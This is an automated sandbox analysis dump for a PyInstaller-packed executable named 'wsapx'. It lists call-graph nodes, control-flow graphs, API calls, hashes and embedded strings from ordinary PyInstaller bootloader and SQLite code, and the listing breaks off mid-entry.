52484 7ff7c71b1b35 52483->52484 52485 7ff7c71b1b16 52483->52485 52487 7ff7c71c040c _fread_nolock 53 API calls 52484->52487 52579 7ff7c71c4f78 11 API calls _set_fmode 52485->52579 52489 7ff7c71b1b4a 52487->52489 52488 7ff7c71b1b1b 52580 7ff7c71b2910 54 API calls _log10_special 52488->52580 52490 7ff7c71b1b6f 52489->52490 52491 7ff7c71b1b50 52489->52491 52583 7ff7c71c0180 37 API calls 2 library calls 52490->52583 52581 7ff7c71c4f78 11 API calls _set_fmode 52491->52581 52495 7ff7c71b1b55 52582 7ff7c71b2910 54 API calls _log10_special 52495->52582 52496 7ff7c71b1b89 52496->52470 52584 7ff7c71b2710 54 API calls _log10_special 52496->52584 52500 7ff7c71b8a2a 52499->52500 52501 7ff7c71b9400 2 API calls 52500->52501 52502 7ff7c71b8a49 GetEnvironmentVariableW 52501->52502 52503 7ff7c71b8ab2 52502->52503 52504 7ff7c71b8a66 ExpandEnvironmentStringsW 52502->52504 52506 7ff7c71bc5c0 _log10_special 8 API calls 52503->52506 52504->52503 52505 7ff7c71b8a88 52504->52505 52585 7ff7c71b94b0 WideCharToMultiByte WideCharToMultiByte __std_exception_destroy 52505->52585 52508 7ff7c71b8ac4 52506->52508 52508->52294 52509 7ff7c71b8a9a 52510 7ff7c71bc5c0 _log10_special 8 API calls 52509->52510 52511 7ff7c71b8aaa 52510->52511 52511->52294 52586 7ff7c71b6350 52512->52586 52516 7ff7c71b3381 52520 7ff7c71b3399 52516->52520 52654 7ff7c71b6040 52516->52654 52518 7ff7c71b338d 52518->52520 52663 7ff7c71b61d0 54 API calls 52518->52663 52557 7ff7c71b3670 FreeLibrary 52520->52557 52521->52303 52523 7ff7c71b7fa4 52522->52523 52524 7ff7c71c0744 73 API calls 52523->52524 52529 7ff7c71b807b __std_exception_destroy 52523->52529 52525 7ff7c71b7fc0 52524->52525 52525->52529 52717 7ff7c71c7938 52525->52717 52527 7ff7c71c0744 73 API calls 52530 7ff7c71b7fd5 52527->52530 52528 7ff7c71c040c _fread_nolock 53 API calls 52528->52530 52529->52296 52530->52527 52530->52528 52530->52529 52531->52360 52532->52360 52533->52306 52534->52309 52535->52314 52536->52317 52537->52334 52538->52360 52539->52335 52540->52360 52541->52348 52542->52360 52543->52333 52545 7ff7c71b1c80 49 API calls 52544->52545 52546 7ff7c71b4650 52545->52546 52546->52354 52546->52546 52547->52386 52548->52390 52549->52393 52550->52398 52551->52406 52552->52397 52553->52404 52554->52404 52555->52367 52557->52380 52558->52385 52559->52426 52560->52426 52562 7ff7c71b36bc GetModuleFileNameW 52561->52562 52562->52430 52562->52431 52564 7ff7c71b9342 52563->52564 52565 7ff7c71b932f FindClose 52563->52565 52566 7ff7c71bc5c0 _log10_special 8 API calls 52564->52566 52565->52564 52567 7ff7c71b371a 52566->52567 52567->52435 52567->52436 52568->52445 52569->52441 52570->52448 52571->52442 52572->52445 52573->52465 52574->52470 52575->52471 52576->52470 52577->52478 52578->52470 52579->52488 52580->52470 52581->52495 52582->52470 52583->52496 52584->52470 52585->52509 52587 7ff7c71b6365 52586->52587 52588 7ff7c71b1c80 49 API calls 52587->52588 52589 7ff7c71b63a1 52588->52589 52590 7ff7c71b63aa 52589->52590 52591 7ff7c71b63cd 52589->52591 52674 7ff7c71b2710 54 API calls _log10_special 52590->52674 52593 7ff7c71b4620 49 API calls 52591->52593 52595 7ff7c71b63e5 52593->52595 52594 7ff7c71b63c3 52597 7ff7c71bc5c0 _log10_special 8 API calls 52594->52597 52596 7ff7c71b6403 52595->52596 52675 7ff7c71b2710 54 API calls _log10_special 52595->52675 52664 7ff7c71b4550 52596->52664 52600 7ff7c71b336e 52597->52600 52600->52520 52617 7ff7c71b64f0 52600->52617 52602 7ff7c71b641b 52604 7ff7c71b4620 49 API calls 52602->52604 52603 7ff7c71b9070 3 API calls 52603->52602 52605 7ff7c71b6434 52604->52605 52606 7ff7c71b6459 52605->52606 52607 7ff7c71b6439 52605->52607 52670 7ff7c71b9070 52606->52670 52676 7ff7c71b2710 54 API calls _log10_special 52607->52676 52610 7ff7c71b6466 52611 7ff7c71b64b1 52610->52611 52612 7ff7c71b6472 52610->52612 52678 7ff7c71b5820 137 API calls 52611->52678 52614 7ff7c71b9400 2 API calls 52612->52614 52615 7ff7c71b648a GetLastError 52614->52615 52677 7ff7c71b2c50 51 API calls _log10_special 52615->52677 52679 7ff7c71b53f0 52617->52679 52619 7ff7c71b6516 52620 7ff7c71b652f 52619->52620 52621 7ff7c71b651e 52619->52621 52686 7ff7c71b4c80 52620->52686 52704 7ff7c71b2710 54 API calls _log10_special 52621->52704 52625 7ff7c71b653b 52705 7ff7c71b2710 54 API calls _log10_special 52625->52705 52626 7ff7c71b654c 52629 7ff7c71b655c 52626->52629 52631 7ff7c71b656d 52626->52631 52628 7ff7c71b652a 52628->52516 52706 7ff7c71b2710 54 API calls _log10_special 52629->52706 52632 7ff7c71b659d 52631->52632 52633 7ff7c71b658c 52631->52633 52635 7ff7c71b65bd 52632->52635 52636 7ff7c71b65ac 52632->52636 52707 7ff7c71b2710 54 API calls _log10_special 52633->52707 52690 7ff7c71b4d40 52635->52690 52708 7ff7c71b2710 54 API calls _log10_special 52636->52708 52640 7ff7c71b65dd 52643 7ff7c71b65ec 52640->52643 52645 7ff7c71b65fd 52640->52645 52641 7ff7c71b65cc 52709 7ff7c71b2710 54 API calls _log10_special 52641->52709 52710 7ff7c71b2710 54 API calls _log10_special 52643->52710 52646 7ff7c71b660f 52645->52646 52648 7ff7c71b6620 52645->52648 52711 7ff7c71b2710 54 API calls _log10_special 52646->52711 52651 7ff7c71b664a 52648->52651 52712 7ff7c71c7320 73 API calls 52648->52712 52650 7ff7c71b6638 52713 7ff7c71c7320 73 API calls 52650->52713 52651->52628 52714 7ff7c71b2710 54 API calls _log10_special 52651->52714 52655 7ff7c71b6060 52654->52655 52655->52655 52656 7ff7c71b6089 52655->52656 52659 7ff7c71b60a0 __std_exception_destroy 52655->52659 52716 7ff7c71b2710 54 API calls _log10_special 52656->52716 52658 7ff7c71b6095 52658->52518 52660 7ff7c71b1470 116 API calls 52659->52660 52661 7ff7c71b2710 54 API calls 52659->52661 52662 7ff7c71b61ab 52659->52662 52660->52659 52661->52659 52662->52518 52663->52520 52665 7ff7c71b455a 52664->52665 52666 7ff7c71b9400 2 API calls 52665->52666 52667 7ff7c71b457f 52666->52667 52668 7ff7c71bc5c0 _log10_special 8 API calls 52667->52668 52669 7ff7c71b45a7 52668->52669 52669->52602 52669->52603 52671 7ff7c71b9400 2 API calls 52670->52671 52672 7ff7c71b9084 LoadLibraryExW 52671->52672 52673 7ff7c71b90a3 __std_exception_destroy 52672->52673 52673->52610 52674->52594 52675->52596 52676->52594 52677->52594 52678->52594 52681 7ff7c71b541c 52679->52681 52680 7ff7c71b5424 52680->52619 52681->52680 52684 7ff7c71b55c4 52681->52684 52715 7ff7c71c6b14 48 API calls 52681->52715 52682 7ff7c71b5787 __std_exception_destroy 52682->52619 52683 7ff7c71b47c0 47 API calls 52683->52684 52684->52682 52684->52683 52687 7ff7c71b4cb0 52686->52687 52688 7ff7c71bc5c0 _log10_special 8 API calls 52687->52688 52689 7ff7c71b4d1a 52688->52689 52689->52625 52689->52626 52691 7ff7c71b4d55 52690->52691 52692 7ff7c71b1c80 49 API calls 52691->52692 52693 7ff7c71b4da1 52692->52693 52694 7ff7c71b1c80 49 API calls 52693->52694 52703 7ff7c71b4e23 __std_exception_destroy 52693->52703 52696 7ff7c71b4de0 52694->52696 52695 7ff7c71bc5c0 _log10_special 8 API calls 52697 7ff7c71b4e6e 52695->52697 52698 7ff7c71b9400 2 API calls 52696->52698 52696->52703 52697->52640 52697->52641 52699 7ff7c71b4df6 52698->52699 52700 7ff7c71b9400 2 API calls 52699->52700 52701 7ff7c71b4e0d 52700->52701 52702 7ff7c71b9400 2 API calls 52701->52702 52702->52703 52703->52695 52704->52628 52705->52628 52706->52628 52707->52628 52708->52628 52709->52628 52710->52628 52711->52628 52712->52650 52713->52651 52714->52628 52715->52681 52716->52658 52718 7ff7c71c7968 52717->52718 52721 7ff7c71c7444 52718->52721 52720 7ff7c71c7981 52720->52530 52722 7ff7c71c745f 52721->52722 52723 7ff7c71c748e 52721->52723 52732 7ff7c71ca884 37 API calls 2 library calls 52722->52732 52731 7ff7c71c54dc EnterCriticalSection 52723->52731 52726 7ff7c71c747f 52726->52720 52727 7ff7c71c7493 52728 7ff7c71c74b0 38 API calls 52727->52728 52729 7ff7c71c749f 52728->52729 52730 7ff7c71c54e8 _fread_nolock LeaveCriticalSection 52729->52730 52730->52726 52732->52726

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 0 7ff7c71b1000-7ff7c71b3806 call 7ff7c71bfe88 call 7ff7c71bfe90 call 7ff7c71bc8c0 call 7ff7c71c5460 call 7ff7c71c54f4 call 7ff7c71b36b0 14 7ff7c71b3814-7ff7c71b3836 call 7ff7c71b1950 0->14 15 7ff7c71b3808-7ff7c71b380f 0->15 20 7ff7c71b391b-7ff7c71b3931 call 7ff7c71b45b0 14->20 21 7ff7c71b383c-7ff7c71b3856 call 7ff7c71b1c80 14->21 17 7ff7c71b3c97-7ff7c71b3cb2 call 7ff7c71bc5c0 15->17 28 7ff7c71b3933-7ff7c71b3960 call 7ff7c71b7f80 20->28 29 7ff7c71b396a-7ff7c71b397f call 7ff7c71b2710 20->29 25 7ff7c71b385b-7ff7c71b389b call 7ff7c71b8a20 21->25 34 7ff7c71b38c1-7ff7c71b38cc call 7ff7c71c4fa0 25->34 35 7ff7c71b389d-7ff7c71b38a3 25->35 41 7ff7c71b3962-7ff7c71b3965 call 7ff7c71c00bc 28->41 42 7ff7c71b3984-7ff7c71b39a6 call 7ff7c71b1c80 28->42 37 7ff7c71b3c8f 29->37 49 7ff7c71b38d2-7ff7c71b38e1 call 7ff7c71b8a20 34->49 50 7ff7c71b39fc-7ff7c71b3a2a call 7ff7c71b8b30 call 7ff7c71b8b90 * 3 34->50 38 7ff7c71b38af-7ff7c71b38bd call 7ff7c71b8b90 35->38 39 7ff7c71b38a5-7ff7c71b38ad 35->39 37->17 38->34 39->38 41->29 53 7ff7c71b39b0-7ff7c71b39b9 42->53 57 7ff7c71b39f4-7ff7c71b39f7 call 7ff7c71c4fa0 49->57 58 7ff7c71b38e7-7ff7c71b38ed 49->58 76 7ff7c71b3a2f-7ff7c71b3a3e call 7ff7c71b8a20 50->76 53->53 56 7ff7c71b39bb-7ff7c71b39d8 call 7ff7c71b1950 53->56 56->25 68 7ff7c71b39de-7ff7c71b39ef call 7ff7c71b2710 56->68 57->50 61 7ff7c71b38f0-7ff7c71b38fc 58->61 65 7ff7c71b3905-7ff7c71b3908 61->65 66 7ff7c71b38fe-7ff7c71b3903 61->66 65->57 69 7ff7c71b390e-7ff7c71b3916 call 7ff7c71c4fa0 65->69 66->61 66->65 68->37 69->76 79 7ff7c71b3b45-7ff7c71b3b53 76->79 80 7ff7c71b3a44-7ff7c71b3a47 76->80 81 7ff7c71b3b59-7ff7c71b3b5d 79->81 82 7ff7c71b3a67 79->82 80->79 83 7ff7c71b3a4d-7ff7c71b3a50 80->83 84 7ff7c71b3a6b-7ff7c71b3a90 call 7ff7c71c4fa0 81->84 82->84 85 7ff7c71b3a56-7ff7c71b3a5a 83->85 86 7ff7c71b3b14-7ff7c71b3b17 83->86 94 7ff7c71b3a92-7ff7c71b3aa6 call 7ff7c71b8b30 84->94 95 7ff7c71b3aab-7ff7c71b3ac0 84->95 85->86 88 7ff7c71b3a60 85->88 89 7ff7c71b3b2f-7ff7c71b3b40 call 7ff7c71b2710 86->89 90 7ff7c71b3b19-7ff7c71b3b1d 86->90 88->82 98 7ff7c71b3c7f-7ff7c71b3c87 89->98 90->89 91 7ff7c71b3b1f-7ff7c71b3b2a 90->91 91->84 94->95 99 7ff7c71b3ac6-7ff7c71b3aca 95->99 100 7ff7c71b3be8-7ff7c71b3bfa call 7ff7c71b8a20 95->100 98->37 102 7ff7c71b3ad0-7ff7c71b3ae8 call 7ff7c71c52c0 99->102 103 7ff7c71b3bcd-7ff7c71b3be2 call 7ff7c71b1940 99->103 108 7ff7c71b3c2e 100->108 109 7ff7c71b3bfc-7ff7c71b3c02 100->109 113 7ff7c71b3b62-7ff7c71b3b7a call 7ff7c71c52c0 102->113 114 7ff7c71b3aea-7ff7c71b3b02 call 7ff7c71c52c0 102->114 103->99 103->100 115 7ff7c71b3c31-7ff7c71b3c40 call 7ff7c71c4fa0 108->115 111 7ff7c71b3c04-7ff7c71b3c1c 109->111 112 7ff7c71b3c1e-7ff7c71b3c2c 109->112 111->115 112->115 122 7ff7c71b3b87-7ff7c71b3b9f call 7ff7c71c52c0 113->122 123 7ff7c71b3b7c-7ff7c71b3b80 113->123 114->103 124 7ff7c71b3b08-7ff7c71b3b0f 114->124 125 7ff7c71b3d41-7ff7c71b3d63 call 7ff7c71b44d0 115->125 126 7ff7c71b3c46-7ff7c71b3c4a 115->126 139 7ff7c71b3ba1-7ff7c71b3ba5 122->139 140 7ff7c71b3bac-7ff7c71b3bc4 call 7ff7c71c52c0 122->140 123->122 124->103 137 7ff7c71b3d71-7ff7c71b3d82 call 7ff7c71b1c80 125->137 138 7ff7c71b3d65-7ff7c71b3d6f call 7ff7c71b4620 125->138 127 7ff7c71b3c50-7ff7c71b3c5f call 7ff7c71b90e0 126->127 128 7ff7c71b3cd4-7ff7c71b3ce6 call 7ff7c71b8a20 126->128 141 7ff7c71b3c61 127->141 142 7ff7c71b3cb3-7ff7c71b3cbd call 7ff7c71b8850 127->142 143 7ff7c71b3d35-7ff7c71b3d3c 128->143 144 7ff7c71b3ce8-7ff7c71b3ceb 128->144 152 7ff7c71b3d87-7ff7c71b3d96 137->152 138->152 139->140 140->103 154 7ff7c71b3bc6 140->154 149 7ff7c71b3c68 call 7ff7c71b2710 141->149 164 7ff7c71b3cbf-7ff7c71b3cc6 142->164 165 7ff7c71b3cc8-7ff7c71b3ccf 142->165 143->149 144->143 150 7ff7c71b3ced-7ff7c71b3d10 call 7ff7c71b1c80 144->150 160 7ff7c71b3c6d-7ff7c71b3c77 149->160 166 7ff7c71b3d12-7ff7c71b3d26 call 7ff7c71b2710 call 7ff7c71c4fa0 150->166 167 7ff7c71b3d2b-7ff7c71b3d33 call 7ff7c71c4fa0 150->167 157 7ff7c71b3dc4-7ff7c71b3dda call 7ff7c71b9400 152->157 158 7ff7c71b3d98-7ff7c71b3d9f 152->158 154->103 170 7ff7c71b3de8-7ff7c71b3e04 SetDllDirectoryW 157->170 171 7ff7c71b3ddc 157->171 158->157 162 7ff7c71b3da1-7ff7c71b3da5 158->162 160->98 162->157 168 7ff7c71b3da7-7ff7c71b3dbe SetDllDirectoryW LoadLibraryExW 162->168 164->149 165->152 166->160 167->152 168->157 174 7ff7c71b3f01-7ff7c71b3f08 170->174 175 7ff7c71b3e0a-7ff7c71b3e19 call 7ff7c71b8a20 170->175 171->170 180 7ff7c71b3f0e-7ff7c71b3f15 174->180 181 7ff7c71b3ffc-7ff7c71b4004 174->181 189 7ff7c71b3e32-7ff7c71b3e3c call 7ff7c71c4fa0 175->189 190 7ff7c71b3e1b-7ff7c71b3e21 175->190 180->181 186 7ff7c71b3f1b-7ff7c71b3f25 call 7ff7c71b33c0 180->186 182 7ff7c71b4006-7ff7c71b4023 PostMessageW GetMessageW 181->182 183 7ff7c71b4029-7ff7c71b4034 call 7ff7c71b36a0 call 7ff7c71b3360 181->183 182->183 200 7ff7c71b4039-7ff7c71b405b call 7ff7c71b3670 call 7ff7c71b6fb0 call 7ff7c71b6d60 183->200 186->160 196 7ff7c71b3f2b-7ff7c71b3f3f call 7ff7c71b90c0 186->196 201 7ff7c71b3ef2-7ff7c71b3efc call 7ff7c71b8b30 189->201 202 7ff7c71b3e42-7ff7c71b3e48 189->202 193 7ff7c71b3e23-7ff7c71b3e2b 190->193 194 7ff7c71b3e2d-7ff7c71b3e2f 190->194 193->194 194->189 207 7ff7c71b3f41-7ff7c71b3f5e PostMessageW GetMessageW 196->207 208 7ff7c71b3f64-7ff7c71b3fa7 call 7ff7c71b8b30 call 7ff7c71b8bd0 call 7ff7c71b6fb0 call 7ff7c71b6d60 call 7ff7c71b8ad0 196->208 201->174 202->201 206 7ff7c71b3e4e-7ff7c71b3e54 202->206 210 7ff7c71b3e5f-7ff7c71b3e61 206->210 211 7ff7c71b3e56-7ff7c71b3e58 206->211 207->208 247 7ff7c71b3fe9-7ff7c71b3ff7 call 7ff7c71b1900 208->247 248 7ff7c71b3fa9-7ff7c71b3fb3 call 7ff7c71b9200 208->248 210->174 212 7ff7c71b3e67-7ff7c71b3e83 call 7ff7c71b6db0 call 7ff7c71b7330 210->212 211->212 215 7ff7c71b3e5a 211->215 227 7ff7c71b3e85-7ff7c71b3e8c 212->227 228 7ff7c71b3e8e-7ff7c71b3e95 212->228 215->174 230 7ff7c71b3edb-7ff7c71b3ef0 call 7ff7c71b2a50 call 7ff7c71b6fb0 call 7ff7c71b6d60 227->230 231 7ff7c71b3eaf-7ff7c71b3eb9 call 7ff7c71b71a0 228->231 232 7ff7c71b3e97-7ff7c71b3ea4 call 7ff7c71b6df0 228->232 230->174 245 7ff7c71b3ec4-7ff7c71b3ed2 call 7ff7c71b74e0 231->245 246 7ff7c71b3ebb-7ff7c71b3ec2 231->246 232->231 244 7ff7c71b3ea6-7ff7c71b3ead 232->244 244->230 245->174 256 7ff7c71b3ed4 245->256 246->230 247->160 248->247 259 7ff7c71b3fb5-7ff7c71b3fca 248->259 256->230 260 7ff7c71b3fe4 call 7ff7c71b2a50 259->260 261 7ff7c71b3fcc-7ff7c71b3fdf call 7ff7c71b2710 call 7ff7c71b1900 259->261 260->247 261->160
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                                • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                                • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                                • Opcode ID: c0a66ebca772141f760a29a0dd77fc68e5502f7a94feb123d2d63e937376cc0c
                                                                                                                                                                                                                                                • Instruction ID: 8a0433d2a297f1ae2080a340be932a6bcead0bd754eeb409eb830f4b06b84214
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c0a66ebca772141f760a29a0dd77fc68e5502f7a94feb123d2d63e937376cc0c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC329FA1A0868293FB25BF25B4552B9E651EFD4FA0FC44432DE5D432C6DF2CE56AC320

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 465 7ff7c71d69d4-7ff7c71d6a47 call 7ff7c71d6708 468 7ff7c71d6a61-7ff7c71d6a6b call 7ff7c71c8590 465->468 469 7ff7c71d6a49-7ff7c71d6a52 call 7ff7c71c4f58 465->469 475 7ff7c71d6a86-7ff7c71d6aef CreateFileW 468->475 476 7ff7c71d6a6d-7ff7c71d6a84 call 7ff7c71c4f58 call 7ff7c71c4f78 468->476 474 7ff7c71d6a55-7ff7c71d6a5c call 7ff7c71c4f78 469->474 488 7ff7c71d6da2-7ff7c71d6dc2 474->488 479 7ff7c71d6af1-7ff7c71d6af7 475->479 480 7ff7c71d6b6c-7ff7c71d6b77 GetFileType 475->480 476->474 485 7ff7c71d6b39-7ff7c71d6b67 GetLastError call 7ff7c71c4eec 479->485 486 7ff7c71d6af9-7ff7c71d6afd 479->486 482 7ff7c71d6b79-7ff7c71d6bb4 GetLastError call 7ff7c71c4eec CloseHandle 480->482 483 7ff7c71d6bca-7ff7c71d6bd1 480->483 482->474 499 7ff7c71d6bba-7ff7c71d6bc5 call 7ff7c71c4f78 482->499 491 7ff7c71d6bd3-7ff7c71d6bd7 483->491 492 7ff7c71d6bd9-7ff7c71d6bdc 483->492 485->474 486->485 493 7ff7c71d6aff-7ff7c71d6b37 CreateFileW 486->493 497 7ff7c71d6be2-7ff7c71d6c37 call 7ff7c71c84a8 491->497 492->497 498 7ff7c71d6bde 492->498 493->480 493->485 503 7ff7c71d6c56-7ff7c71d6c87 call 7ff7c71d6488 497->503 504 7ff7c71d6c39-7ff7c71d6c45 call 7ff7c71d6910 497->504 498->497 499->474 511 7ff7c71d6c8d-7ff7c71d6ccf 503->511 512 7ff7c71d6c89-7ff7c71d6c8b 503->512 504->503 510 7ff7c71d6c47 504->510 513 7ff7c71d6c49-7ff7c71d6c51 call 7ff7c71cab30 510->513 514 7ff7c71d6cf1-7ff7c71d6cfc 511->514 515 7ff7c71d6cd1-7ff7c71d6cd5 511->515 512->513 513->488 518 7ff7c71d6da0 514->518 519 7ff7c71d6d02-7ff7c71d6d06 514->519 515->514 517 7ff7c71d6cd7-7ff7c71d6cec 515->517 517->514 518->488 519->518 520 7ff7c71d6d0c-7ff7c71d6d51 CloseHandle CreateFileW 519->520 522 7ff7c71d6d53-7ff7c71d6d81 GetLastError call 7ff7c71c4eec call 7ff7c71c86d0 520->522 523 7ff7c71d6d86-7ff7c71d6d9b 520->523 522->523 523->518
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                • Instruction ID: 8f976919f97738e0c6914738063a1009788b273b3c4705686e7d387d067904c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09C1D332B28A4186EB11EFA9E4902AC7771F799FA8B414225DE2E577D4CF38E512C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: -journal$immutable$nolock
                                                                                                                                                                                                                                                • API String ID: 3344901894-4201244970
                                                                                                                                                                                                                                                • Opcode ID: 6d2302c2d273f82fd05ed0fcece98cc456367649c3faf61b02af63669267510c
                                                                                                                                                                                                                                                • Instruction ID: 1b661b4845b30a7ea58dc90bd7c12713d66ecfbd4025f0bfaafd68391e5aff4c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d2302c2d273f82fd05ed0fcece98cc456367649c3faf61b02af63669267510c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B32C122B09B86C6EB748FA594A03793791FF46B94F098234CA5E4B796DF3CE465C340
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: database schema is locked: %s$out of memory$statement too long
                                                                                                                                                                                                                                                • API String ID: 3344901894-1046679716
                                                                                                                                                                                                                                                • Opcode ID: 0debb23e3739cc449da5461e64965afd84d721c678890d73669033abb012c6c3
                                                                                                                                                                                                                                                • Instruction ID: 0ce8414dd05fb6f888f18bf2999d4f2ccc4d0ac207a82c4e75e59c2a274a3eb7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0debb23e3739cc449da5461e64965afd84d721c678890d73669033abb012c6c3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFF1B522B08789D6EB35DFA195A03BA77A1FB86B45F088135DA4D07796DF7CE440CB80
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2668687282.00007FFD94491000.00000080.00000001.01000000.00000004.sdmp, Offset: 00007FFD93DD0000, based on PE: true
